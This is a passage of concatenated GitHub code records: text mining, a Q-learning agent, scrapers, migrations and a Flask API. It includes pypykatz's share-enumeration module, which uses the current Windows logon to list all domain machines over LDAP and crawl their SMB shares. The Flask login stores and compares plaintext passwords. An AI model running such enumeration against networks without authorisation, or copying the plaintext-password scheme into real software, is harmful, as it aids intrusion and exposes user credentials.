get_25_citedby(pmids, output):\n '''\n Records info about 25 articles as a tsv file\n '''\n link = create_scopus_link(pmids)\n try:\n json = requests.get(link, headers={'X-ELS-APIKEY':API}).json()['search-results']['entry']\n except:\n print(\"Unable to send request\")\n return\n for pmid, info in zip(pmids,json):\n try:\n date = info['prism:coverDate']\n citedby = info['citedby-count']\n title = info['dc:title']\n pubmed = info['pubmed-id']\n with open(output, 'a+') as output:\n output.write('%s\\t%s\\t%s\\t%s\\t%s\\n' % (pmid, date, citedby, title, pubmed))\n except:\n print('Unable to retrieve article with PMID %s' % pmid)\n\n\ndef clean_text(location, new_location):\n '''\n Clean a textfile, save a new one\n '''\n stop = stopwords.words('english')\n def remove_stop(word):\n if word not in stop:\n return word\n else:\n return np.nan\n stemmer = PorterStemmer()\n file = open(location, 'r').read()\n l = file.split('====')\n body = l[2]\n body = pd.Series(body.split())\n body = body.str.lower()\n body = body[~body.str.contains('www|http|@')]\n body = body.str.replace('[^\\w\\s]', '')\n body = body[~body.str.contains('^\\d+$')]\n body = body.apply(remove_stop).dropna()\n body = body.apply(stemmer.stem)\n body.to_csv(new_location, index=False)\n return body\n\ndef clean_all_files_in_dir(inpdir, outdir):\n for f in os.listdir(inpdir):\n try:\n clean_text(inpdir+f, outdir+f)\n except Exception as e:\n print(e)\n\n", "repo_name": "ilsenatorov/articles", "sub_path": "mining.py", "file_name": "mining.py", "file_ext": "py", "file_size_in_byte": 2734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 28, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 67, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 72, "usage_type": "attribute"}, {"api_name": "nltk.stem.PorterStemmer", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "74594433767", "text": "import copy\nimport random\n\nimport numpy as np\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import Adadelta\n\n# A system for steering based on the center line of the road using a deep Q-network, meaning the network\n# gradually learns while attempting to drive the car\n# Created by brendon-ai, January 2018\n\n# The base discount rate, which should be between 0 and 1\nBASE_DISCOUNT = 0.8\n\n# The initial value exploration rate used for the reinforcement learning algorithm\nEPSILON_INITIAL = 1.0\n# The decay value by which the epsilon is multiplied every iteration\nEPSILON_DECAY = 0.9999\n# The minimum value that epsilon can decay to\nEPSILON_MIN = 0.01\n# The minimum number of examples in the memory before training begins\nMIN_TRAINING_EXAMPLES = 100\n\n\n# The deep Q-network agent, including a neural network but handling training and other functionality\nclass DeepQNetworkAgent:\n\n # Initialize the agent including the model and other attributes\n def __init__(self, state_size, action_size):\n # Initialize the value of epsilon which will be changed over the life of the agent\n self.epsilon = EPSILON_INITIAL\n\n # Initialize the agent's memory, which will store past time steps for training\n self.memory = []\n\n # Set the provided state size and action size as global variables\n self.state_size = state_size\n self.action_size = action_size\n\n # Use a rectified linear activation function\n activation = 'tanh'\n # Create the neural network model simply using a series of dense layers\n self.model = Sequential([\n Dense(3, input_shape=(self.state_size,), activation=activation),\n Dense(5, activation=activation),\n Dense(self.action_size)\n ])\n # Use an Adam optimizer with the predefined learning rate\n optimizer = Adadelta()\n # Compile the model with a mean squared error loss\n self.model.compile(\n loss='mse',\n optimizer=optimizer\n )\n\n # Add a set of values packaged as a single time step to the memory, and update rewards for previous memories\n def remember(self, state, action, reward, done):\n # Add the new value to the memory as it is (it will be updated to accommodate future rewards later)\n self.memory.append([state, action, reward, done])\n # Get the index of the most recent element in the memory\n max_memory_index = len(self.memory) - 1\n # Iterate over all indices in the array, excluding the one that was just added, in reverse\n for memory_index in reversed(range(max_memory_index)):\n # If the game ended at this example, it had no bearing on future rewards, so iteration should stop\n memory_example = self.memory[memory_index]\n if memory_example[3]:\n break\n\n # Get the age of this memory example (the number of examples that have been added since this one)\n age = max_memory_index - memory_index\n # Take the discount to the power of the age of this example\n # This will exponentially discount the value of the current reward for older examples in the memory\n discount = BASE_DISCOUNT ** age\n # Multiply the current reward by this discount and add it to the reward for this previous example\n memory_example[2] += reward * discount\n\n # Run a prediction on a state and return an array of predicted rewards for each possible action\n def predict(self, state):\n # Use the neural network to process the state directly\n network_output = self.model.predict(state)\n # Return the first element of the output on the first axis, effectively removing the single-element batch axis\n return network_output[0]\n\n # Act based on a provided state, choosing either to explore or to act based on past learning\n def act(self, state):\n # Choose randomly whether or not to act randomly, depending on the exploration rate\n if np.random.rand() <= self.epsilon:\n # Choose a random value less than the number of valid actions\n return random.randrange(self.action_size)\n # Otherwise, an action must be chosen based on the current state\n else:\n # Use the neural network to predict the reward for each of the valid actions\n reward_predictions = self.predict(state)\n # The actions is the index of the maximum predicted reward\n return np.argmax(reward_predictions)\n\n # Decay the epsilon so that actions become more frequently determined by the network rather than randomly\n def decay(self):\n # If the epsilon has not already gone as low as it is allowed to\n if self.epsilon > EPSILON_MIN:\n # Multiply it by the decay factor\n self.epsilon *= EPSILON_DECAY\n\n # Train the neural network model; this is to be iterated over, and yields the loss or None on each iteration\n def train(self):\n # Run an infinite loop in which the training is done\n while True:\n # Yield immediately if there is less than a specified number of training examples in the memory, so that the\n # network does not quickly overfit on a very small number of examples\n if len(self.memory) < MIN_TRAINING_EXAMPLES:\n yield None\n\n # Iterate over the entire memory in a random order\n memory_random = copy.copy(self.memory)\n random.shuffle(memory_random)\n for state, action, reward, _ in memory_random:\n # Make a prediction based on this state, but replace the reward for the action on this time step\n target_prediction = self.model.predict(state)\n target_prediction[0, action] = reward\n # Train the model based on this modified prediction, getting the most recent loss value\n loss = self.model.fit(x=state, y=target_prediction, epochs=1, verbose=0).history['loss'][0]\n # Yield the loss to the calling loop so that inference can be done between any pair of training runs\n yield loss\n", "repo_name": "bfmat/LaneDetection", "sub_path": "model/deep_q_network_agent.py", "file_name": "deep_q_network_agent.py", "file_ext": "py", "file_size_in_byte": 6194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.models.Sequential", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.optimizers.Adadelta", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 96, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "74899928169", "text": "import csv\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass EscolaScraper:\n def __init__(self, nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade):\n self.nome = nome\n self.endereco = endereco\n self.cidade = cidade\n self.estado = estado\n self.telefone = telefone\n self.cep = cep\n self.nivel_escolaridade = nivel_escolaridade\n\n\ndef coletar_escolas():\n escolas = []\n\n\n service = Service('/Users/joaosilva/Downloads/chromedriver_mac64/chromedriver') # Substitua pelo caminho do chromedriver\n options = Options()\n options.add_argument('--headless') # Executar o Chrome em modo headless (sem interface gráfica)\n driver = webdriver.Chrome(service=service, options=options)\n\n\n driver.get('https://www.google.com')\n search_box = driver.find_element(By.NAME, 'q')\n search_box.send_keys('escolas de tres lagoas')\n search_box.send_keys(Keys.RETURN)\n\n resultados = driver.find_elements(By.CLASS_NAME, 'g')\n\n for resultado in resultados:\n try:\n nome = resultado.find_element(By.TAG_NAME, 'h3').text\n endereco = resultado.find_element(By.CSS_SELECTOR, 'div.VkpGBb').text\n cidade_estado = resultado.find_element(By.CSS_SELECTOR, 'span.B6fmyf').text\n telefone = resultado.find_element(By.CSS_SELECTOR, 'div.xpdopen > div > div > div > span').text\n cep = resultado.find_element(By.CSS_SELECTOR, 'span.LrzXr').get_attribute('data-attrid')\n nivel_escolaridade = resultado.find_element(By.CSS_SELECTOR, 'div.qsm0tb').text\n\n cidade_estado_split = cidade_estado.split(',')\n cidade = cidade_estado_split[0].strip()\n estado = cidade_estado_split[1].strip()\n\n escola = EscolaScraper(nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade)\n escolas.append(escola)\n except Exception as e:\n print(f\"Erro ao extrair informações: {str(e)}\")\n\n driver.quit()\n\n return escolas\n\n\ndef salvar_csv(escolas):\n with open('escolas.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerow(['Nome', 'Endereço', 'Cidade', 'Estado', 'Telefone', 'CEP', 'Nível de Escolaridade'])\n for escola in escolas:\n writer.writerow([escola.nome, escola.endereco, escola.cidade, escola.estado, escola.telefone,\n escola.cep, escola.nivel_escolaridade])\n\n\nescolas = coletar_escolas()\nsalvar_csv(escolas)", "repo_name": "JPGSilva/web-scraping", "sub_path": "EscolaScraper.py", "file_name": "EscolaScraper.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.NAME", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 42, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "6679857745", "text": "from collections import Counter\nimport os\n\n\ndef get_words_perline(file_name):\n \"\"\"\n 获取每行的单词\n :type file_name: 文件名\n \"\"\"\n lines = []\n\n if os.path.exists(file_name):\n with open(file_name, 'r') as f:\n for line in f:\n lines.append(line.split())\n return lines\n\n\ndef get_word_count(file_name):\n \"\"\"\n 统计单词出现次数\n :type file_name: 文件名\n \"\"\"\n lines = get_words_perline(file_name)\n cnt = Counter()\n for line in lines:\n cnt = cnt + Counter(line)\n return cnt\n\n\ndef get_import_word(file_name):\n cnt = get_word_count(file_name)\n print(cnt)\n import_list = cnt.most_common(1)\n print('the most import word is:' + import_list[0][0])\n\nif __name__ == \"__main__\":\n get_import_word(\"word.txt\")\n", "repo_name": "Sesshoumaru/python-exercise", "sub_path": "0007/codes/0006.py", "file_name": "0006.py", "file_ext": "py", "file_size_in_byte": 810, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "23096688333", "text": "from django.conf.urls import include, url\nfrom vsf_user.front import views\n\n\nurlpatterns = [\n url(\n r'^list-apikey/$',\n views.ListAPIUsers.as_view(),\n name='api-users-list'\n ),\n url(\n r'^list-apikey-ajax/$',\n views.APIUsersDataTableAjax.as_view(),\n ),\n url(\n r'^(?P[0-9]+)/delete-apikey/$',\n views.DeleteAPIUsers.as_view(),\n name='api-users-delete'\n ),\n\n]\n", "repo_name": "VEinteligente/vsf-incidents-server", "sub_path": "vsf_user/front/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 439, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers", "line_number": 8, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax", "line_number": 13, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers", "line_number": 17, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "10461658798", "text": "from PIL import ImageFont, ImageDraw, Image\nimport argparse\n# https://blog.gtwang.org/programming/opencv-drawing-functions-tutorial/\n\ndef paste(name, output):\n image = Image.open(\"./base.png\")\n drawer = ImageDraw.Draw(image)\n name_len = len(name)\n if name_len == 4:\n font = ImageFont.truetype(\"./標楷體.ttf\", 68)\n drawer.text((922, 853), name, font=font, fill=(0, 0, 0))\n elif name_len == 5:\n font = ImageFont.truetype(\"./標楷體.ttf\", 55)\n drawer.text((918, 858), name, font=font, fill=(0, 0, 0))\n elif name_len == 6:\n font = ImageFont.truetype(\"./標楷體.ttf\", 50)\n drawer.text((912, 862), name, font=font, fill=(0, 0, 0))\n else:\n raise NotImplementedError\n image.save(output)\n\ndef main(args):\n name = args.name + \"同學\" if args.student else args.name\n paste(name, args.output)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"name\", type=str)\n parser.add_argument(\"output\", type=str)\n parser.add_argument(\"--student\", action=\"store_true\", default=False)\n args = parser.parse_args()\n \n main(args)\n", "repo_name": "jimlinntu/gbc-paste", "sub_path": "paste.py", "file_name": "paste.py", "file_ext": "py", "file_size_in_byte": 1145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 13, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 16, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "4585676599", "text": "\"\"\"empty message\n\nRevision ID: 4744a3a56f55\nRevises: 97fd285963c7\nCreate Date: 2020-01-18 20:10:06.316710\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4744a3a56f55'\ndown_revision = '97fd285963c7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('person', sa.Column('address', sa.String(length=200), nullable=False))\n op.add_column('person', sa.Column('phone', sa.String(length=20), nullable=False))\n op.create_unique_constraint(None, 'person', ['address'])\n op.create_unique_constraint(None, 'person', ['phone'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_column('person', 'phone')\n op.drop_column('person', 'address')\n # ### end Alembic commands ###\n", "repo_name": "Rhpozzo/FlaskAPI", "sub_path": "migrations/versions/4744a3a56f55_.py", "file_name": "4744a3a56f55_.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "20124023132", "text": "from msldap.commons.factory import LDAPConnectionFactory\nfrom aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen\n\ndef get_smb_url(authmethod = 'ntlm', protocol_version = '2', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'smb%s+sspi-%s://%s\\\\%s@%s' % (protocol_version, authmethod, info['domain'], info['username'], logonserver)\n\n\ndef get_ldap_url(authmethod = 'ntlm', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'ldap+sspi-%s://%s\\\\%s@%s' % (authmethod, info['domain'], info['username'], logonserver)\n\nclass LDAPTargetGen:\n\tdef __init__(self, url):\n\t\tself.url = url\n\t\n\tasync def generate(self):\n\t\ttry:\n\t\t\tconn_url = LDAPConnectionFactory.from_url(self.url)\n\t\t\tconnection = conn_url.get_client()\n\t\t\t_, err = await connection.connect()\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\t\n\t\t\tadinfo = connection._ldapinfo\n\t\t\tdomain_name = adinfo.distinguishedName.replace('DC','').replace('=','').replace(',','.')\n\n\t\t\tasync for machine, err in connection.get_all_machines(attrs=['sAMAccountName', 'dNSHostName', 'objectSid']):\n\t\t\t\tif err is not None:\n\t\t\t\t\traise err\n\t\t\t\t\t\n\t\t\t\tdns = machine.dNSHostName\n\t\t\t\tif dns is None:\n\t\t\t\t\tdns = '%s.%s' % (machine.sAMAccountName[:-1], domain_name)\n\t\t\t\t\n\t\t\t\tyield str(machine.objectSid), str(dns), None\n\n\t\texcept Exception as e:\n\t\t\tyield None, None, e\n\t\n\nasync def shareenum(smb_url, ldap_url = None, targets = None, smb_worker_count = 10, depth = 3, out_file = None, progress = False, max_items = None, dirsd = False, filesd = False, authmethod = 'ntlm', protocol_version = '2', output_type = 'str', max_runtime = None, exclude_share = ['print$'], exclude_dir = [], exclude_target = []):\n\n\tif smb_url == 'auto':\n\t\tsmb_url = get_smb_url(authmethod=authmethod, protocol_version=protocol_version)\n\t\n\tenumerator = SMBFileEnum(\n\t\tsmb_url,\n\t\tworker_count = smb_worker_count, \n\t\tdepth = depth, \n\t\tout_file = out_file, \n\t\tshow_pbar = progress,\n\t\tmax_items = max_items,\n\t\tfetch_dir_sd = dirsd,\n\t\tfetch_file_sd = filesd,\n\t\toutput_type = output_type,\n\t\tmax_runtime = max_runtime,\n\t\texclude_share = exclude_share,\n\t\texclude_dir = exclude_dir,\n\t\texclude_target = exclude_target\n\t)\n\t\n\tnotfile = []\n\tif targets is not None:\n\t\tfor target in targets:\n\t\t\ttry:\n\t\t\t\tf = open(target, 'r')\n\t\t\t\tf.close()\n\t\t\t\tenumerator.target_gens.append(FileTargetGen(target))\n\t\t\texcept:\n\t\t\t\tnotfile.append(target)\n\t\t\n\t\tif len(notfile) > 0:\n\t\t\tenumerator.target_gens.append(ListTargetGen(notfile))\n\t\n\tif ldap_url is not None:\n\t\tif ldap_url == 'auto':\n\t\t\tldap_url = get_ldap_url(authmethod=authmethod)\n\t\tenumerator.target_gens.append(LDAPTargetGen(ldap_url))\n\n\tif len(enumerator.target_gens) == 0:\n\t\tenumerator.enum_url = True\n\t\t#raise Exception('No suitable targets found!')\n\n\tawait enumerator.run()\n", "repo_name": "skelsec/pypykatz", "sub_path": "pypykatz/smb/shareenum.py", "file_name": "shareenum.py", "file_ext": "py", "file_size_in_byte": 2987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2505, "dataset": "github-code", "pt": "53", "api": [{"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 6, "usage_type": "call"}, {"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 16, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory.from_url", "line_number": 30, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory", "line_number": 30, "usage_type": "name"}, {"api_name": "aiosmb.examples.smbshareenum.SMBFileEnum", "line_number": 58, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.FileTargetGen", "line_number": 80, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.ListTargetGen", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "34256755892", "text": "#!/usr/bin/env python\n\"\"\"Tests for `dlink` package.\"\"\"\nimport os\nfrom argparse import Namespace\nfrom pathlib import Path\n\nimport pytest\n\nfrom dlink import core\n\n\n@pytest.fixture\ndef populate(tmp_path):\n # At the risk of this not being super clear.\n # 1. Make a directory and a bunch of files.\n base = tmp_path / \"base\"\n base.mkdir()\n for i in range(5):\n # This is kinda sloppy because / makes a new directory and I'm genuinely\n # unsure of what the clean way to concatenate strings and Paths together\n (base / (str(i) + \".txt\")).write_text(\"Foo\")\n\n return base\n\n\n@pytest.fixture\ndef args(tmp_path, populate):\n namespace = Namespace()\n namespace.destination = populate\n namespace.log = True\n namespace.log_level = 10\n namespace.recursive = False\n namespace.glob_pattern = \"\"\n namespace.source = tmp_path / \"src\"\n namespace.source.mkdir()\n return namespace\n\n\ndef test_symlink(tmp_path):\n d = tmp_path\n d.mkdir(exist_ok=True)\n dest = d / \"any_file.txt\"\n dest.write_text(\"Probably not necessary\")\n # Start with a path object. Then parameterize this?\n src = tmp_path / \"link\"\n core.symlink(src, dest)\n assert Path.is_symlink(src)\n assert Path.is_file(dest)\n\n\ndef test_generate_dest(populate):\n ret = core.generate_dest(populate)\n for i in range(5):\n file = populate / (str(i) + \".txt\")\n assert file == ret[i]\n\n\ndef test_main(args):\n os.chdir(args.source)\n core.main(args)\n assert \"0.txt\" in os.listdir()\n\n\ndef test_logging(args, caplog):\n os.chdir(args.source)\n core.main(args)\n for record in caplog.records:\n assert record.levelname != \"ERROR\"\n\n\nif __name__ == \"__main__\":\n pytest.main()\n", "repo_name": "farisachugthai/dlink", "sub_path": "tests/test_dlink.py", "file_name": "test_dlink.py", "file_ext": "py", "file_size_in_byte": 1725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "argparse.Namespace", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "dlink.core.symlink", "line_number": 46, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 46, "usage_type": "name"}, {"api_name": "pathlib.Path.is_symlink", "line_number": 47, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "name"}, {"api_name": "pathlib.Path.is_file", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "dlink.core.generate_dest", "line_number": 52, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 52, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 59, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 60, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 60, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 65, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 66, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 66, "usage_type": "name"}, {"api_name": "pytest.main", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "13020101618", "text": "from flask import Flask, make_response, request\nimport os\nfrom crud import Crud\nfrom routes_helper import RoutesHelper\nfrom flask_cors import CORS\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"http://127.0.0.1:5000\"}})\n\n@app.route('/api/register', methods=['POST'])\ndef register():\n user_table = Crud('user')\n users = user_table.get_all_elements()\n json = request.json\n user_in_bd = False\n\n if all(key in json.keys() for key in ['email', 'pw', 'name']):\n for user in users:\n if(user['email'] == json['email']):\n user_in_bd = True\n if(not user_in_bd):\n cols, values = RoutesHelper.insert_element('user', json.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n else:\n return make_response({\"error\": \"Já existe uma conta com este email.\"}), 409\n else:\n message = 'Missing required fields'\n return make_response({'error': message}), 400\n\n\n@app.route('/api/login', methods=['POST'])\ndef login():\n email = request.json.get('email')\n password = request.json.get('pw')\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n message = {'error': 'Email ou Password invalidos. '}\n return make_response(message), 401\n\n@app.route('/api/google/login', methods=['POST'])\ndef login_google():\n req = request.json\n\n name = req.get('name')\n email = req.get('email')\n password = req.get('pw')\n\n if not (name and email and password):\n return make_response({'error':'Está em falta name ou email ou uid no body do request.'})\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n \n user_table = Crud('user')\n cols, values = RoutesHelper.insert_element('user', req.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n\n\n@app.route('/api/user/', methods=['GET'])\ndef get_user(id_user):\n\n user_handler = Crud('user')\n user = user_handler.get_element_by_pk(id_user, 'id')\n\n if user:\n return make_response(user)\n \n return make_response({'error':'Este utilizador não existe.'})\n\n@app.route('/api/videos/', methods=['GET'])\ndef get_video_details(id):\n video_handler = Crud('video')\n video_details = video_handler.get_element_by_pk(id,'id')\n\n if 